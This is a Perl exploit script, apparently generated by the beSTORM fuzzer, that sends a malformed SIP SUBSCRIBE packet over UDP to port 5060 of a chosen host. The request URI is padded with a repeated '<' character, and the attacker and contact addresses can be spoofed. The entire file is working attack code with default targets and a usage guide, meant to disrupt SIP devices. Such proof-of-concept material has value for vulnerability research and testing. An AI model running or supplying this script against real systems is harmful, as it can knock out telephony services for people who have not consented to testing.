#!/usr/bin/perl -w
# Exploit generated by beSTORM on 2005-04-12 13:06
# Copyright   Beyond Security Ltd.

use IO::Socket;
use strict;

my $target = shift;
my $print_usage = 0;
my $repeated_type = "<";

if (!$target)
{
 usage();

 print "No target has been supplied, reverting to 192.168.1.1.\n";
 $target = "192.168.1.1";
}

my $repeating = shift;
if (!$repeating )
{
 usage();

 print "Repeating has not been supplied, reverting to 10.\n";
 $repeating = 10;
}

my $attackerip = shift;
if (!$attackerip)
{
 usage();

 print "Attacker IP address has not been supplied, reverting to 192.168.1.2.\n";
 $attackerip = "192.168.1.2";
}

my $attackedip = shift;
if (!$attackedip)
{
 usage();
 
 print "Contact IP address has not been supplied, reverting to 
192.168.1.3.\n";
 $attackedip = "192.168.1.3";
}

print "Will attack $target.\n";
print "Attacker IP address defined as: $attackerip\n";
print "Attacked IP address defined as: $attackedip\n";
print "Will repeat '<' $repeating times\n";

my $repeated_data = ($repeated_type x $repeating);
my $target_port = 5060;

my $packet =<<END;
SUBSCRIBE sip:$repeated_data:$repeated_data\@$attackerip SIP/2.0\r
To: <sip:$attackedip:$target_port>\r
Via: SIP/2.0/UDP $attackedip:3277\r
From: "STORM"<sip:$attackedip:3277>\r
Call-ID: 1STORM9210\@$attackedip\r
CSeq: 1 INVITE\r
Max-Forwards: 70\r
Contact: <sip:$attackerip:5059>\r
\r
END

print "Sending: [$packet]\n";

socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp"));

my $ipaddr = inet_aton($target);
my $sendto = sockaddr_in($target_port,$ipaddr);

send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to 
$target : $target_port : $!\n";

print "Done.\n";

sub usage
{
 if ($print_usage) { return; }
 $print_usage = 1;
 print ("#"x50);
 print "\n";
 print "# $0 [hostname] [repeater] [attackerip] [attackedip]\n";
 print "# hostname\t-\tThe host the packet will be sent to.\n";
 print "# repeater\t-\tThe number of times the character will be sent (repeated character $repeated_type).\n";
 print "# attackerip\t-\tThe IP address from which the packet should be\n";
 print "\t\t\taddressed from (doesn't have to be your IP address).\n";
 print "# attackedip\t-\tThe IP address that you are contacting\n";
 print "\t\t\t(doesn't have to be the hostname IP's address).\n";
 print "\n";
 print "Results may vary depending on how the remote host handles packets.\n";
 print "For example:\n";
 print " * Some SIP Proxies won't look into packets addressed to it (attackedip or attackerip).\n";
 print " * Some SIP Routers won't handle packets that aren't addressed to it.\n";
 print "etc\n";
 print "\n";
}